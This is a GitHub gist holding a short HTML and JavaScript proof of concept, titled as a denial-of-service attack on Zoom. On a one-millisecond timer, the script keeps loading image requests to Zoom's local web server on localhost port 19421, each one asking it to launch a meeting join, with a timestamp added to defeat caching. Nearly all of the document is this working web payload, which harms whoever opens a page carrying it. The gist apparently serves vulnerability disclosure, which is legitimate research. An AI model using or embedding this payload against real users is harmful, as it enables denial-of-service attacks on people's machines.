Created
July 7, 2019 04:01
-
-
Save JLLeitschuh/a2d5f27f320f614f0028ce54333ece4f to your computer and use it in GitHub Desktop.
Denial of service POC for Zoom
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body> | |
<script> | |
// It's actually better if this number isn't a valid zoom number. | |
var attackNumber = "694138052" | |
setInterval(function(){ | |
var image = document.createElement("img"); | |
// Use a date to bust the browser's cache | |
var date = new Date(); | |
image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime(); | |
image.onload = function() { | |
// Be tidy, clean up the DOM afterwards | |
image.parentNode.removeChild(image); | |
}; | |
document.body.appendChild(image); | |
}, 1); | |
</script> | |
</body> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment